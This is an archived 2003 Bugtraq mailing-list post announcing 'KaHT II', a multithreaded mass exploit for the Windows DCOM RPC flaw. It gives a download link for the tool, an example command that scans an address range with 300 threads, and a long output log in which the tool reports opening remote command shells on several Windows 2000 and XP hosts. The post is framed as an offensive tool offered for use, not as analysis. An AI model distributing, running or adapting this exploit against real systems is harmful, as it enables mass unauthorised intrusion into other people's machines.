lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 11 Aug 2003 23:20:50 +0200 From: "at4r ins4n3" <at4r@...mail.com> To: <bugtraq@...urityfocus.com> Subject: KaHT II - Massive RPC Dcom exploit.. multithreading &os detection && macros support... exploit can be found here: www.croulder.com/haxorcitos/kaht2.zip example: KaHT.exe 10.10.40.0 10.10.255.255 300 _________________________________________________ KAHT II - MASSIVE RPC EXPLOIT DCOM RPC exploit. Modified by aT4r@...esign.es #haxorcitos && #localhost @Efnet Ownz you!!! ________________________________________________ [+] Targets: 10.10.40.0-10.10.255.255 with 300 Threads [+] Scan In Progress... - Connecting to 10.10.40.4 Sending Exploit to a [Win2k] Server.... FAILED - Connecting to 10.10.40.9 Sending Exploit to a [WinXP] Server.... FAILED - Connecting to 10.10.40.12 Sending Exploit to a [WinXP] Server.... FAILED - Connecting to 10.10.40.21 Sending Exploit to a [WinXP] Server... - Conectando con la Shell Remota... Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>. - Connection Closed - Connecting to 10.10.40.52 Sending Exploit to a [WinXP] Server... FAILED . - Connecting to 10.10.40.50 Sending Exploit to a [Win2k] Server... - Conectando con la Shell Remota... Microsoft Windows 2000 [Versión 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>exit - Connection Closed - Connecting to 10.10.40.62 Sending Exploit to a [WinXP] Server.... FAILED - Connecting to 10.10.40.78 Sending Exploit to a [Win2k] Server... - Conectando con la Shell Remota... Microsoft Windows 2000 [Versión 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>. C:\WINNT\system32>...exit - Connection Closed - Connecting to 10.10.40.105 Sending Exploit to a [Win2k] Server... FAILED - Connecting to 10.10.40.97 Sending Exploit to a [Win2k] Server... FAILED - Connecting to 10.10.40.116 Sending Exploit to a [WinXP] Server... - Conectando con la Shell Remota... Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> C:\WINDOWS\system32>exit - Connection Closed - Connecting to 10.10.40.129 Sending Exploit to a [WinXP] Server... - Conectando con la Shell Remota... Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>exit - Connection Closed - Connecting to 10.10.40.128 Sending Exploit to a [Win2k] Server... FAILED - Connecting to 10.10.40.151 Sending Exploit to a [WinXP] Server... FAILED - Connecting to 10.10.40.163 Sending Exploit to a [Win2k] Server... FAILED - Connecting to 10.10.40.166 Sending Exploit to a [WinXP] Server... FAILED - Connecting to 10.10.40.168 Sending Exploit to a [WinXP] Server.... FAILED - Connecting to 10.10.40.233 Sending Exploit to a [WinXP] Server... FAILED - Connecting to 10.10.40.83 Sending Exploit to a [WinXP] Server... FAILED - Connecting to 10.10.40.238 Sending Exploit to a [WinXP] Server... FAILED - Connecting to 10.10.40.250 Sending Exploit to a [Win2k] Server... - Conectando con la Shell Remota... Microsoft Windows 2000 [Versión 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>
Powered by blists - more mailing lists